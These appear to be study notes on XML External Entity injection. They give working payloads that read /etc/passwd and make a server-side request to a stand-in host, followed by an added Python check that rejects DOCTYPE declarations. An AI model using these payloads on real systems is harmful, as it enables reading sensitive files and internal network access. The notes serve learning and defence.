XXE (XML External Entity) injection: injecting a malicious external entity definition into the XML of a request and then referencing it, or uploading it through a file upload vulnerability.

XML is mostly used for storing and transferring data. Example:

<person>
    <name>John Doe</name>
    <age>30</age>
    <email>john.doe@example.com</email>
</person>

Discovery:

Check requests for an XML body that stores some values.

The exploiting XML code may look like:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>

Note: in the declaration above, the file reference is stored in an entity (a variable) named xxe, so if we find another value being used in the request, we can reference xxe in its place, like:

<stockCheck>
  <productId>&xxe;</productId>
  <storeId>3</storeId>
</stockCheck>

You can use several different payloads; refer to a cheatsheet.

XXE to SSRF:

An XXE request can also be made to connect to a remote server, causing SSRF, like:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "https://evil_website.com">
]>
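
Defensive counterpart to the two payloads above (file read and SSRF), as an added example that is not part of the original notes: a Python check that logs which external entities a body declares and refuses any request body carrying a DOCTYPE. The function names, the DTDForbidden exception and the sample bodies are assumptions made for illustration.

```python
import xml.parsers.expat as expat

# Constructed sample bodies modelled on the stockCheck request in these notes.
BENIGN = b"<stockCheck><productId>381</productId><storeId>3</storeId></stockCheck>"
XXE_BODY = (b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
            b"<stockCheck><productId>&xxe;</productId><storeId>3</storeId></stockCheck>")

class DTDForbidden(ValueError):
    """Raised when a request body carries a DOCTYPE declaration."""

def audit_entities(body: bytes) -> list:
    """Return (name, system_id) for each external entity declared, for logging."""
    found = []
    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:
            found.append((name, system_id))
    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity
    try:
        # No ExternalEntityRefHandler is set, so the system_id is never fetched.
        parser.Parse(body, True)
    except expat.ExpatError:
        pass  # malformed body: still report what was declared before the error
    return found

def parse_stock_check(body: bytes) -> dict:
    """Parse a stockCheck body, rejecting it as soon as a DOCTYPE appears."""
    fields, stack = {}, []
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden("DOCTYPE %r not allowed in request body" % name)
    def on_start(tag, attrs):
        stack.append(tag)
    def on_end(tag):
        stack.pop()
    def on_text(data):
        if len(stack) == 2:  # text directly inside a child of the root
            fields[stack[-1]] = fields.get(stack[-1], "") + data
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler, parser.EndElementHandler = on_start, on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(body, True)
    return fields

if __name__ == "__main__":
    print(parse_stock_check(BENIGN))
    print(audit_entities(XXE_BODY))
```

Rejecting the DOCTYPE outright means the entity is never defined, so neither the file:// nor the https:// variant reaches the application.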